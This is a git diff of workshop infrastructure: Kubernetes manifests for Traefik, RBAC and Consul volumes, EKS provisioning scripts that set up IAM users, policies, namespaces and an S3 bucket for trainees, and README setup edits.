||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: socat
|
||||
sessionAffinity: None
|
||||
type: NodePort
|
||||
status:
|
||||
loadBalancer: {}
|
||||
|
||||
17
k8s/test.yaml
Normal file
17
k8s/test.yaml
Normal file
@@ -0,0 +1,17 @@
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
spec:
|
||||
#tls:
|
||||
#- secretName: whatever.A.B.C.D.nip.io
|
||||
# hosts:
|
||||
# - whatever.A.B.C.D.nip.io
|
||||
rules:
|
||||
- host: whatever.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 1234
|
||||
87
k8s/traefik-v1.yaml
Normal file
87
k8s/traefik-v1.yaml
Normal file
@@ -0,0 +1,87 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:1.7
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --api
|
||||
- --kubernetes
|
||||
- --logLevel=INFO
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
102
k8s/traefik-v2.yaml
Normal file
102
k8s/traefik-v2.yaml
Normal file
@@ -0,0 +1,102 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:v2.5
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --accesslog
|
||||
- --api
|
||||
- --api.insecure
|
||||
- --log.level=INFO
|
||||
- --metrics.prometheus
|
||||
- --providers.kubernetesingress
|
||||
- --entrypoints.http.Address=:80
|
||||
- --entrypoints.https.Address=:443
|
||||
- --entrypoints.https.http.tls.certResolver=default
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- networking.k8s.io
|
||||
resources:
|
||||
- ingresses
|
||||
- ingressclasses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
100
k8s/traefik.yaml
100
k8s/traefik.yaml
@@ -1,100 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: extensions/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --api
|
||||
- --kubernetes
|
||||
- --logLevel=INFO
|
||||
---
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: traefik-ingress-service
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: traefik-ingress-lb
|
||||
ports:
|
||||
- protocol: TCP
|
||||
port: 80
|
||||
name: web
|
||||
- protocol: TCP
|
||||
port: 8080
|
||||
name: admin
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
1
k8s/traefik.yaml
Symbolic link
1
k8s/traefik.yaml
Symbolic link
@@ -0,0 +1 @@
|
||||
traefik-v2.yaml
|
||||
33
k8s/user=jean.doe.yaml
Normal file
33
k8s/user=jean.doe.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: user=jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ user=jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: user=jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: user=jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
64
k8s/volumes-for-consul.yaml
Normal file
64
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,64 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
13
prepare-eks/10_create_cluster.sh
Executable file
13
prepare-eks/10_create_cluster.sh
Executable file
@@ -0,0 +1,13 @@
|
||||
#!/bin/sh
|
||||
# Create an EKS cluster.
|
||||
# This is not idempotent (each time you run it, it creates a new cluster).
|
||||
|
||||
eksctl create cluster \
|
||||
--node-type=t3.large \
|
||||
--nodes-max=10 \
|
||||
--alb-ingress-access \
|
||||
--asg-access \
|
||||
--ssh-access \
|
||||
--with-oidc \
|
||||
#
|
||||
|
||||
32
prepare-eks/20_create_users.sh
Executable file
32
prepare-eks/20_create_users.sh
Executable file
@@ -0,0 +1,32 @@
|
||||
#!/bin/sh
|
||||
# For each user listed in "users.txt", create an IAM user.
|
||||
# Also create AWS API access keys, and store them in "users.keys".
|
||||
# This is idempotent (you can run it multiple times, it will only
|
||||
# create the missing users). However, it will not remove users.
|
||||
# Note that you can remove users from "users.keys" (or even wipe
|
||||
# that file out entirely) and then this script will delete their
|
||||
# keys and generate new keys for them (and add the new keys to
|
||||
# "users.keys".)
|
||||
|
||||
echo "Getting list of existing users ..."
|
||||
aws iam list-users --output json | jq -r .Users[].UserName > users.tmp
|
||||
|
||||
for U in $(cat users.txt); do
|
||||
if ! grep -qw $U users.tmp; then
|
||||
echo "Creating user $U..."
|
||||
aws iam create-user --user-name=$U \
|
||||
--tags=Key=container.training,Value=1
|
||||
fi
|
||||
if ! grep -qw $U users.keys; then
|
||||
echo "Listing keys for user $U..."
|
||||
KEYS=$(aws iam list-access-keys --user=$U | jq -r .AccessKeyMetadata[].AccessKeyId)
|
||||
for KEY in $KEYS; do
|
||||
echo "Deleting key $KEY for user $U..."
|
||||
aws iam delete-access-key --user=$U --access-key-id=$KEY
|
||||
done
|
||||
echo "Creating access key for user $U..."
|
||||
aws iam create-access-key --user=$U --output json \
|
||||
| jq -r '.AccessKey | [ .UserName, .AccessKeyId, .SecretAccessKey ] | @tsv' \
|
||||
>> users.keys
|
||||
fi
|
||||
done
|
||||
51
prepare-eks/30_create_or_update_policy.sh
Executable file
51
prepare-eks/30_create_or_update_policy.sh
Executable file
@@ -0,0 +1,51 @@
|
||||
#!/bin/sh
|
||||
# Create an IAM policy to authorize users to do "aws eks update-kubeconfig".
|
||||
# This is idempotent, which allows to update the policy document below if
|
||||
# you want the users to do other things as well.
|
||||
# Note that each time you run this script, it will actually create a new
|
||||
# version of the policy, set that version as the default version, and
|
||||
# remove all non-default versions. (Because you can only have up to
|
||||
# 5 versions of a given policy, so you need to clean them up.)
|
||||
# After running that script, you will want to attach the policy to our
|
||||
# users (check the other scripts in that directory).
|
||||
|
||||
POLICY_NAME=user.container.training
|
||||
POLICY_DOC='{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Action": [
|
||||
"eks:DescribeCluster"
|
||||
],
|
||||
"Resource": "arn:aws:eks:*",
|
||||
"Effect": "Allow"
|
||||
}
|
||||
]
|
||||
}'
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
|
||||
aws iam create-policy-version \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
|
||||
--policy-document "$POLICY_DOC" \
|
||||
--set-as-default
|
||||
|
||||
# For reference, the command below creates a policy without versioning:
|
||||
#aws iam create-policy \
|
||||
#--policy-name user.container.training \
|
||||
#--policy-document "$JSON"
|
||||
|
||||
for VERSION in $(
|
||||
aws iam list-policy-versions \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
|
||||
--query 'Versions[?!IsDefaultVersion].VersionId' \
|
||||
--output text)
|
||||
do
|
||||
aws iam delete-policy-version \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME \
|
||||
--version-id "$VERSION"
|
||||
done
|
||||
|
||||
# For reference, the command below shows all users using the policy:
|
||||
#aws iam list-entities-for-policy \
|
||||
#--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
|
||||
14
prepare-eks/40_attach_policy.sh
Executable file
14
prepare-eks/40_attach_policy.sh
Executable file
@@ -0,0 +1,14 @@
|
||||
#!/bin/sh
|
||||
# Attach our user policy to all the users defined in "users.txt".
|
||||
# This should be idempotent, because attaching the same policy
|
||||
# to the same user multiple times doesn't do anything.
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
POLICY_NAME=user.container.training
|
||||
|
||||
for U in $(cat users.txt); do
|
||||
echo "Attaching policy to user $U ..."
|
||||
aws iam attach-user-policy \
|
||||
--user-name $U \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
|
||||
done
|
||||
24
prepare-eks/50_aws_auth.sh
Executable file
24
prepare-eks/50_aws_auth.sh
Executable file
@@ -0,0 +1,24 @@
|
||||
#!/bin/sh
|
||||
# Update the aws-auth ConfigMap to map our IAM users to Kubernetes users.
|
||||
# Each user defined in "users.txt" will be mapped to a Kubernetes user
|
||||
# with the same name, and put in the "container.training" group, too.
|
||||
# This is idempotent.
|
||||
# WARNING: this will wipe out the mapUsers component of the aws-auth
|
||||
# ConfigMap, removing all users that aren't in "users.txt".
|
||||
# It won't touch mapRoles, so it shouldn't break the role mappings
|
||||
# put in place by EKS.
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
|
||||
rm -f users.map
|
||||
for U in $(cat users.txt); do
|
||||
echo "\
|
||||
- userarn: arn:aws:iam::$ACCOUNT:user/$U
|
||||
username: $U
|
||||
groups: [ container.training ]\
|
||||
" >> users.map
|
||||
done
|
||||
|
||||
kubectl create --namespace=kube-system configmap aws-auth \
|
||||
--dry-run=client --from-file=mapUsers=users.map -o yaml \
|
||||
| kubectl apply -f-
|
||||
65
prepare-eks/60_setup_rbac_and_ns.sh
Executable file
65
prepare-eks/60_setup_rbac_and_ns.sh
Executable file
@@ -0,0 +1,65 @@
|
||||
#!/bin/sh
|
||||
# Create a shared Kubernetes Namespace ("container-training") as well as
|
||||
# individual namespaces for every user in "users.txt", and set up a bunch
|
||||
# of permissions.
|
||||
# Specifically:
|
||||
# - each user gets "view" permissions in the "default" Namespace
|
||||
# - each user gets "edit" permissions in the "container-training" Namespace
|
||||
# - each user gets permissions to list Nodes and Namespaces
|
||||
# - each user gets "admin" permissions in their personal Namespace
|
||||
# Note that since Kubernetes Namespaces can't have dots in their names,
|
||||
# if a user has dots, dots will be mapped to dashes.
|
||||
# So user "ada.lovelace" will get namespace "ada-lovelace".
|
||||
# This is kind of idempotent (but will raise a bunch of errors for objects
|
||||
# that already exist).
|
||||
# TODO: if this needs to evolve, replace all the "create" operations by
|
||||
# "apply" operations. But this is good enough for now.
|
||||
|
||||
kubectl create rolebinding --namespace default container.training \
|
||||
--group=container.training --clusterrole=view
|
||||
|
||||
kubectl create clusterrole view-nodes \
|
||||
--verb=get,list,watch --resource=node
|
||||
kubectl create clusterrolebinding view-nodes \
|
||||
--group=container.training --clusterrole=view-nodes
|
||||
|
||||
kubectl create clusterrole view-namespaces \
|
||||
--verb=get,list,watch --resource=namespace
|
||||
kubectl create clusterrolebinding view-namespaces \
|
||||
--group=container.training --clusterrole=view-namespaces
|
||||
|
||||
kubectl create namespace container-training
|
||||
kubectl create rolebinding --namespace container-training edit \
|
||||
--group=container.training --clusterrole=edit
|
||||
|
||||
# Note: API calls to EKS tend to be fairly slow. To optimize things a bit,
|
||||
# instead of running "kubectl" N times, we generate a bunch of YAML and
|
||||
# apply it. It will still generate a lot of API calls but it's much faster
|
||||
# than calling "kubectl" N times. It might be possible to make this even
|
||||
# faster by generating a "kind: List" (I don't know if this would issue
|
||||
# a single API calls or multiple ones; TBD!)
|
||||
for U in $(cat users.txt); do
|
||||
NS=$(echo $U | tr . -)
|
||||
cat <<EOF
|
||||
---
|
||||
kind: Namespace
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: $NS
|
||||
---
|
||||
kind: RoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: admin
|
||||
namespace: $NS
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: admin
|
||||
subjects:
|
||||
- apiGroup: rbac.authorization.k8s.io
|
||||
kind: User
|
||||
name: $U
|
||||
EOF
|
||||
done | kubectl create -f-
|
||||
|
||||
76
prepare-eks/70_oidc.sh
Executable file
76
prepare-eks/70_oidc.sh
Executable file
@@ -0,0 +1,76 @@
|
||||
#!/bin/sh
|
||||
# Create an IAM role to be used by a Kubernetes ServiceAccount.
|
||||
# The role isn't given any permissions yet (this has to be done by
|
||||
# another script in this series), but a properly configured Pod
|
||||
# should still be able to execute "aws sts get-caller-identity"
|
||||
# and confirm that it's using that role.
|
||||
# This requires the cluster to have an attached OIDC provider.
|
||||
# This should be the case if the cluster has been created with
|
||||
# the scripts in this directory; otherwise, this can be done with
|
||||
# the subsequent command, which is idempotent:
|
||||
# eksctl utils associate-iam-oidc-provider --cluster cluster-name-12341234 --approve
|
||||
# The policy document used below will authorize all ServiceAccounts
|
||||
# in the "container-training" Namespace to use that role.
|
||||
# This script will also annotate the container-training:default
|
||||
# ServiceAccount so that it can use that role.
|
||||
# This script is not quite idempotent: if you want to use a new
|
||||
# trust policy, some work will be required. (You can delete the role,
|
||||
# but that requires detaching the associated policies. There might also
|
||||
# be a way to update the trust policy directly; we didn't investigate this
|
||||
# further at this point.)
|
||||
|
||||
if [ "$1" ]; then
|
||||
CLUSTER="$1"
|
||||
else
|
||||
echo "Please indicate cluster to use. Available clusters:"
|
||||
aws eks list-clusters --output table
|
||||
exit 1
|
||||
fi
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
OIDC=$(aws eks describe-cluster --name $CLUSTER --query cluster.identity.oidc.issuer --output text | cut -d/ -f3-)
|
||||
ROLE_NAME=s3-reader-container-training
|
||||
TRUST_POLICY=$(envsubst <<EOF
|
||||
{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Effect": "Allow",
|
||||
"Principal": {
|
||||
"Federated": "arn:aws:iam::${ACCOUNT}:oidc-provider/${OIDC}"
|
||||
},
|
||||
"Action": "sts:AssumeRoleWithWebIdentity",
|
||||
"Condition": {
|
||||
"StringLike": {
|
||||
"${OIDC}:sub": ["system:serviceaccount:container-training:*"]
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
EOF
|
||||
)
|
||||
|
||||
aws iam create-role \
|
||||
--role-name "$ROLE_NAME" \
|
||||
--assume-role-policy-document "$TRUST_POLICY"
|
||||
|
||||
kubectl annotate serviceaccounts \
|
||||
--namespace container-training default \
|
||||
"eks.amazonaws.com/role-arn=arn:aws:iam::$ACCOUNT:role/$ROLE_NAME" \
|
||||
--overwrite
|
||||
|
||||
exit
|
||||
|
||||
# Here are commands to delete the role:
|
||||
for POLICY_ARN in $(aws iam list-attached-role-policies --role-name $ROLE_NAME --query 'AttachedPolicies[*].PolicyArn' --output text); do aws iam detach-role-policy --role-name $ROLE_NAME --policy-arn $POLICY_ARN; done
|
||||
aws iam delete-role --role-name $ROLE_NAME
|
||||
|
||||
# Merging the policy with the existing policies:
|
||||
{
|
||||
aws iam get-role --role-name s3-reader-container-training | jq -r .Role.AssumeRolePolicyDocument.Statement[]
|
||||
echo "$TRUST_POLICY" | jq -r .Statement[]
|
||||
} | jq -s '{"Version": "2012-10-17", "Statement": .}' > /tmp/policy.json
|
||||
aws iam update-assume-role-policy \
|
||||
--role-name $ROLE_NAME \
|
||||
--policy-document file:///tmp/policy.json
|
||||
54
prepare-eks/80_s3_bucket.sh
Executable file
54
prepare-eks/80_s3_bucket.sh
Executable file
@@ -0,0 +1,54 @@
|
||||
#!/bin/sh
|
||||
# Create an S3 bucket with two objects in it:
|
||||
# - public.txt (world-readable)
|
||||
# - private.txt (private)
|
||||
# Also create an IAM policy granting read-only access to the bucket
|
||||
# (and therefore, to the private object).
|
||||
# Finally, attach the policy to an IAM role (for instance, the role
|
||||
# created by another script in this directory).
|
||||
# This isn't idempotent, but it can be made idempotent by replacing the
|
||||
# "aws iam create-policy" call with "aws iam create-policy-version" and
|
||||
# a bit of extra elbow grease. (See other scripts in this directory for
|
||||
# an example).
|
||||
|
||||
ACCOUNT=$(aws sts get-caller-identity | jq -r .Account)
|
||||
BUCKET=container.training
|
||||
ROLE_NAME=s3-reader-container-training
|
||||
POLICY_NAME=s3-reader-container-training
|
||||
POLICY_DOC=$(envsubst <<EOF
|
||||
{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Effect": "Allow",
|
||||
"Action": [
|
||||
"s3:ListBucket",
|
||||
"s3:GetObject*"
|
||||
],
|
||||
"Resource": [
|
||||
"arn:aws:s3:::$BUCKET",
|
||||
"arn:aws:s3:::$BUCKET/*"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
EOF
|
||||
)
|
||||
|
||||
aws iam create-policy \
|
||||
--policy-name $POLICY_NAME \
|
||||
--policy-doc "$POLICY_DOC"
|
||||
|
||||
aws s3 mb s3://container.training
|
||||
|
||||
echo "this is a public object" \
|
||||
| aws s3 cp - s3://container.training/public.txt \
|
||||
--acl public-read
|
||||
|
||||
echo "this is a private object" \
|
||||
| aws s3 cp - s3://container.training/private.txt \
|
||||
--acl private
|
||||
|
||||
aws iam attach-role-policy \
|
||||
--role-name "$ROLE_NAME" \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
|
||||
50
prepare-eks/users.txt
Normal file
50
prepare-eks/users.txt
Normal file
@@ -0,0 +1,50 @@
|
||||
ada.lovelace
|
||||
adele.goldstine
|
||||
amanda.jones
|
||||
anita.borg
|
||||
ann.kiessling
|
||||
barbara.mcclintock
|
||||
beatrice.worsley
|
||||
bessie.blount
|
||||
betty.holberton
|
||||
beulah.henry
|
||||
carleen.hutchins
|
||||
caroline.herschel
|
||||
dona.bailey
|
||||
dorothy.hodgkin
|
||||
ellen.ochoa
|
||||
edith.clarke
|
||||
elisha.collier
|
||||
elizabeth.feinler
|
||||
emily.davenport
|
||||
erna.hoover
|
||||
frances.spence
|
||||
gertrude.blanch
|
||||
grace.hopper
|
||||
grete.hermann
|
||||
giuliana.tesoro
|
||||
harriet.tubman
|
||||
hedy.lamarr
|
||||
irma.wyman
|
||||
jane.goodall
|
||||
jean.bartik
|
||||
joy.mangano
|
||||
josephine.cochrane
|
||||
katherine.blodgett
|
||||
kathleen.antonelli
|
||||
lynn.conway
|
||||
margaret.hamilton
|
||||
maria.beasley
|
||||
marie.curie
|
||||
marjorie.joyner
|
||||
marlyn.meltzer
|
||||
mary.kies
|
||||
melitta.bentz
|
||||
milly.koss
|
||||
radia.perlman
|
||||
rosalind.franklin
|
||||
ruth.teitelbaum
|
||||
sarah.mather
|
||||
sophie.wilson
|
||||
stephanie.kwolek
|
||||
yvonne.brill
|
||||
@@ -7,9 +7,9 @@ workshop.
|
||||
|
||||
|
||||
## 1. Prerequisites
|
||||
|
||||
Virtualbox, Vagrant and Ansible
|
||||
|
||||
|
||||
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
|
||||
|
||||
- Vagrant: https://www.vagrantup.com/downloads.html
|
||||
@@ -25,7 +25,7 @@ Virtualbox, Vagrant and Ansible
|
||||
|
||||
$ git clone --recursive https://github.com/ansible/ansible.git
|
||||
$ cd ansible
|
||||
$ git checkout stable-2.0.0.1
|
||||
$ git checkout stable-{{ getStableVersionFromAnsibleProject }}
|
||||
$ git submodule update
|
||||
|
||||
- source the setup script to make Ansible available on this terminal session:
|
||||
@@ -38,6 +38,7 @@ Virtualbox, Vagrant and Ansible
|
||||
|
||||
|
||||
## 2. Preparing the environment
|
||||
Change into directory that has your Vagrantfile
|
||||
|
||||
Run the following commands:
|
||||
|
||||
@@ -66,6 +67,14 @@ will reflect inside the instance.
|
||||
|
||||
- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed
|
||||
|
||||
- If you get an error like "no Vagrant file found" or you have a file but "cannot open base box" when running `vagrant up`,
|
||||
chances are good you not in the correct directory.
|
||||
Make sure you are in sub directory named "prepare-local". It has all the config files required by ansible, vagrant and virtualbox
|
||||
|
||||
- If you are using Python 3.7, running the ansible-playbook provisioning, see an error like "SyntaxError: invalid syntax" and it mentions
|
||||
the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
|
||||
https://github.com/ansible/ansible/issues/42105
|
||||
|
||||
- If you get strange Ansible errors about dependencies, try to check your pip
|
||||
version with `pip --version`. The current version is 8.1.1. If your pip is
|
||||
older than this, upgrade it with `sudo pip install --upgrade pip`, restart
|
||||
|
||||
@@ -4,21 +4,32 @@ These tools can help you to create VMs on:
|
||||
|
||||
- Azure
|
||||
- EC2
|
||||
- Hetzner
|
||||
- Linode
|
||||
- OpenStack
|
||||
- OVHcloud
|
||||
- Scaleway
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- [Docker](https://docs.docker.com/engine/installation/)
|
||||
- [Docker Compose](https://docs.docker.com/compose/install/)
|
||||
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
|
||||
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)
|
||||
|
||||
Depending on the infrastructure that you want to use, you also need to install
|
||||
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
|
||||
the CLI that is specific to that cloud. For OpenStack deployments, you will
|
||||
need Terraform.
|
||||
|
||||
And if you want to generate printable cards:
|
||||
|
||||
- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
|
||||
- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)
|
||||
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
|
||||
- [jinja2](https://pypi.python.org/pypi/Jinja2)
|
||||
|
||||
You can install them with pip (perhaps with `pip install --user`, or even use `virtualenv` if that's your thing).
|
||||
|
||||
